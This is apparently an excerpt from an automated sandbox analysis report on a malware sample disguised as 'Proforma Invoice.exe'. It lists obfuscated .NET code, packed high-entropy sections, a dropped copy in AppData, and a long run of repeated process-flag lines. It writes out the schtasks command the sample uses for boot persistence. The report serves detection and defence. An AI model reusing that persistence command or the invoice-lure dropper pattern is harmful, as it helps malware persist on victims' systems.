Source: Proforma Invoice.exe, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: VoAlKljQu.exe.0.dr, Form1.cs	.Net Code: InitializeComponent contains xor as well as GetObject
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, Architectural.cs	.Net Code: Justy
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, Architectural.cs	.Net Code: BfZIR9eYv System.Reflection.Assembly.Load(byte[])
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, Architectural.cs	.Net Code: Justy
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, Architectural.cs	.Net Code: BfZIR9eYv System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06EC04A0 pushfd ; ret	0_2_06EC04A1
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06EC3DF7 pushad ; ret	0_2_06EC3DFE
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06EC3DC1 pushfd ; ret	0_2_06EC3DC2
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 0_2_06EC320B push eax; iretd	0_2_06EC320E
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_013C0B4D push edi; ret	8_2_013C0CC2
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Code function: 8_2_013C0C95 push edi; retf	8_2_013C0C3A
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_05200D70 pushad ; retf	9_2_05200D71
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07192B9E pushfd ; retf	9_2_07192BA0
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07192BBC pushfd ; retf	9_2_07192BBD
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07192BDA pushfd ; retf	9_2_07192BDB
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07192BF6 pushfd ; retf	9_2_07192BF8
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_0719320B push eax; iretd	9_2_0719320E
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07193DC1 pushfd ; ret	9_2_07193DC2
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07193DF7 pushad ; ret	9_2_07193DFE
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_07192C2D pushfd ; retf	9_2_07192C2E
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 9_2_071904A0 pushfd ; ret	9_2_071904A1
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_01030B4D push edi; ret	13_2_01030CC2
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Code function: 13_2_01030C95 push edi; retf	13_2_01030C3A

Source: Proforma Invoice.exe	Static PE information: section name: .text entropy: 7.971460179462412
Source: VoAlKljQu.exe.0.dr	Static PE information: section name: .text entropy: 7.971460179462412

Source: 0.2.Proforma Invoice.exe.25c087c.2.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.Proforma Invoice.exe.5080000.12.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, ybbGOTR1N80dNbk6Yv.cs	High entropy of concatenated method names: 'obcHojbACJ', 'YnKHTkWS94', 'V3UHNmonbN', 'AuPHVudqss', 'SJBHWK3PRm', 'wkNHA4K7Me', 'L35Hyg9bdX', 'n89HDZAL4k', 'OepHGjo5FD', 'MoeHJmlv16'
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, LinkedList.cs	High entropy of concatenated method names: 'mn8lVDqlu', 'Uxue7aya3', 'KsFMnxhPk', 'ruSPXGSHZ', 'tdQBaRbij', 'ApGpyUtBu', 'Bm5j1f22p4rvC7Eu0G', 'yNLEN1RWrWr7H8C9D4', 'Dispose', 'MoveNext'
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, Architectural.cs	High entropy of concatenated method names: 'Sort', 'Sort', 'u3bDyB9EB', 'jnVG6G0sx', 'NAaJ4PRFw', 'RestoreOriginalBitmap', 'Justy', 'mtp2IE8Nv', 'BfZIR9eYv', 'LowestBreakIteration'
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, MainForm.cs	High entropy of concatenated method names: 'QEHEJ0ZEc', 'xWtkSmxXM', 'uUSoOZRtA', 'Dispose', 'yeRTIpRwj', 'r1YXj5fPVZm4y3Ug3f', 'K4LEmEBCcbAGHf4JhV', 'V6KVEyrTgoasGeD8Zb', 'ymWMMfbpAnyZ7dSZbA', 'IhZliPvmPYrV1280b1'
Source: 0.2.Proforma Invoice.exe.5000000.10.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	High entropy of concatenated method names: 'vB7dgYlwIB5e4GotdD', 'h1qusDERcT8AOZTJmN', 'O9t3jXtovErCbWCOlE', 'QkAH1cPp6G', 'RgtTUJcyZL', 's7mHwaN5MT', 'n3AHmM6wxu', 'TUlH3q3EyS', 'XPxHXcdE1G', 'gX3mZCcRjff06'
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, ybbGOTR1N80dNbk6Yv.cs	High entropy of concatenated method names: 'obcHojbACJ', 'YnKHTkWS94', 'V3UHNmonbN', 'AuPHVudqss', 'SJBHWK3PRm', 'wkNHA4K7Me', 'L35Hyg9bdX', 'n89HDZAL4k', 'OepHGjo5FD', 'MoeHJmlv16'
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, LinkedList.cs	High entropy of concatenated method names: 'mn8lVDqlu', 'Uxue7aya3', 'KsFMnxhPk', 'ruSPXGSHZ', 'tdQBaRbij', 'ApGpyUtBu', 'Bm5j1f22p4rvC7Eu0G', 'yNLEN1RWrWr7H8C9D4', 'Dispose', 'MoveNext'
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, Architectural.cs	High entropy of concatenated method names: 'Sort', 'Sort', 'u3bDyB9EB', 'jnVG6G0sx', 'NAaJ4PRFw', 'RestoreOriginalBitmap', 'Justy', 'mtp2IE8Nv', 'BfZIR9eYv', 'LowestBreakIteration'
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, MainForm.cs	High entropy of concatenated method names: 'QEHEJ0ZEc', 'xWtkSmxXM', 'uUSoOZRtA', 'Dispose', 'yeRTIpRwj', 'r1YXj5fPVZm4y3Ug3f', 'K4LEmEBCcbAGHf4JhV', 'V6KVEyrTgoasGeD8Zb', 'ymWMMfbpAnyZ7dSZbA', 'IhZliPvmPYrV1280b1'
Source: 0.2.Proforma Invoice.exe.3599970.7.raw.unpack, wlMuNfYU9ETTr7SmU1.cs	High entropy of concatenated method names: 'vB7dgYlwIB5e4GotdD', 'h1qusDERcT8AOZTJmN', 'O9t3jXtovErCbWCOlE', 'QkAH1cPp6G', 'RgtTUJcyZL', 's7mHwaN5MT', 'n3AHmM6wxu', 'TUlH3q3EyS', 'XPxHXcdE1G', 'gX3mZCcRjff06'
Source: 0.2.Proforma Invoice.exe.25d0894.1.raw.unpack, fJ.cs	High entropy of concatenated method names: 'Jj1', 'MjV', 'VmD', 'OjP', 'AjI', 'sj9', 'jjb', 'yjh', 'RgtTUJcyZL', 'Vmf'

Source: C:\Users\user\Desktop\Proforma Invoice.exe

File created: C:\Users\user\AppData\Roaming\VoAlKljQu.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Proforma Invoice.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VoAlKljQu" /XML "C:\Users\user\AppData\Local\Temp\tmp2AAD.tmp

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\VoAlKljQu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Proforma Invoice.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
